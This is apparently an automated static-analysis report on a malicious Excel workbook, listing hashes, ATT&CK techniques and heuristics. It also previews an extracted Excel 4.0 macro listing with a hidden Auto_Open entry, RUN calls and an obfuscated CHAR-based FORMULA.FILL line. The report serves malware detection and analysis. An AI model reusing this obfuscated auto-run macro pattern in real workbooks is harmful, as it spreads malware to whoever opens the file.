Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 aa1dadf0107298bf…

MALICIOUS

Office (OLE)

Size: 170.5 KB
Created: 2020-05-13 12:30:30
Authoring application: Microsoft Excel
First seen: 2020-09-15
MD5: 907a3ca14a7d7d8935c6cef6b3099595
SHA-1: 09a795336c10b97afa220def992d2737ef89be8d
SHA-256: aa1dadf0107298bff7b12b954abe0123b01b4f199c37c7ba651bbdfe15826f5c
Risk Score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The critical heuristics indicate the presence of Excel 4.0 macros with an Auto_Open entry, which is a known method for executing malicious code upon opening the workbook. The macro sheet contains a call to the RUN function, which is a dangerous API that can be used to execute arbitrary commands. This suggests the file is designed to download and execute a second-stage payload.

Heuristics (3)

  • Excel 4.0 Auto_Open defined name [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs [critical] OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename         Kind        Source                                                   Size
xlm_macros.txt   xlm-macro   oletools.olevba.extract_all_macros (XLM macro listing)   128605 bytes
SHA-256: a31815bf21c0ab2a75be3cd45bcdb326bdb96c851baf6b9878f1b9c507196fd8

Preview: first 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!FB24833 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,IN149,RUN(JR64351),""
'  Sheet,FW2390,"FORMULA.FILL(CHAR(T31774-GY32083)&CHAR(T31774+DX48757)&CHAR(FE984-IH18784)&CHAR(DG32354/BN65075)&CHAR(T31774+JG38594)&CHAR(GL695+JJ30532)&CHAR(K20656/ER35049)&CHAR(K20656*GL15773)&CHAR(JC11703*DI41309)&CHAR(GL695/CA4554)&CHAR(DI58491/IN2905)&CHAR(GL695/JG22019)&CHAR(T31774-DJ48336)&CHAR(J3105-IV51366)&CHAR(DG32354-CD8198)&CHAR(K20656*HV55895)&CHAR(J3105/O11920)&CHAR(DE56695*IG14371)&CHAR(J3105*CL9659)&CHAR(DG32354-BC7645)&CHAR(DG32354-CD52859)&CHAR(DI58491-JH27430)&CHAR(K20656*CM36843)&CHAR(DG32354/HD36454)&CHAR(DI58491*HJ5193)&CHAR(DE56695*BD18094),FW2391)",""
'  Sheet,FW2392,RUN(CJ5851),""
... (truncated)